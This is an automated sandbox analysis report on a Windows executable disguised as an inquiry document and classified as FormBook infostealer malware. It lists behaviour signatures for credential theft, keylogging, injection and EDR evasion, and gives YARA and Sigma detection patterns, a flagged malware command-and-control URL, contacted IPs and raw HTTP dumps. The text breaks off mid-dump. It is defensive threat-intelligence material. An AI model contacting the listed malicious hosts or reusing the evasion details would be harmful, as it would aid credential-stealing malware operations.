Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20-EM-00- PI-INQ-3001.exe

Overview

General Information

Sample name:20-EM-00- PI-INQ-3001.exe
Analysis ID:1503379
MD5:f295444b03c418b35dcb676ed284e846
SHA1:314ca3515894c3d36b10653a7bace039a6991f19
SHA256:594db372022016f6e585ebdba18d74c642ce91613bdb2925d11b0e499c9d46d9
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 20-EM-00- PI-INQ-3001.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe" MD5: F295444B03C418B35DCB676ED284E846)
    • svchost.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eVmdoPPWSZoVOB.exe (PID: 6016 cmdline: "C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • firefox.exe (PID: 7400 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x64446:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x4c7c5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious RASdial Activity
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe" , ParentImage: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe, ParentProcessId: 6016, ParentProcessName: eVmdoPPWSZoVOB.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 8104, ProcessName: rasdial.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ParentImage: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe, ParentProcessId: 7752, ParentProcessName: 20-EM-00- PI-INQ-3001.exe, ProcessCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ProcessId: 7780, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ParentImage: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe, ParentProcessId: 7752, ParentProcessName: 20-EM-00- PI-INQ-3001.exe, ProcessCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ProcessId: 7780, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: 20-EM-00- PI-INQ-3001.exeReversingLabs: Detection: 29%
            Source: 20-EM-00- PI-INQ-3001.exeVirustotal: Detection: 28%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 20-EM-00- PI-INQ-3001.exeJoe Sandbox ML: detected
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1922768601.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E54696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E54696
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E5C9C7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5C93C FindFirstFileW,FindClose,0_2_00E5C93C
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E5F200
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E5F35D
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E5F65E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E53A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E53A2B
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E53D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E53D4E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E5BF27
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A1C420 FindFirstFileW,FindNextFileW,FindClose,6_2_02A1C420
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 4x nop then xor eax, eax5_2_02AB2266
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeCode function: 4x nop then pop edi5_2_02AACDC3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_02A09B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi6_2_02A0E109
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_047D04DF

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.jaxo.xyz
            Source: Joe Sandbox ViewIP Address: 176.57.64.102 176.57.64.102
            Source: Joe Sandbox ViewIP Address: 167.172.133.32 167.172.133.32
            Source: Joe Sandbox ViewIP Address: 18.183.3.45 18.183.3.45
            Source: Joe Sandbox ViewIP Address: 194.233.65.154 194.233.65.154
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E625E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E625E2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Sep 2024 11:54:56 GMTserver: Apacheset-cookie: __tad=1725364496.8828139; expires=Fri, 01-Sep-2034 11:54:56 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Sep 2024 11:54:59 GMTserver: Apacheset-cookie: __tad=1725364499.3792583; expires=Fri, 01-Sep-2034 11:54:59 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Sep 2024 11:55:01 GMTserver: Apacheset-cookie: __tad=1725364501.8386285; expires=Fri, 01-Sep-2034 11:55:01 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 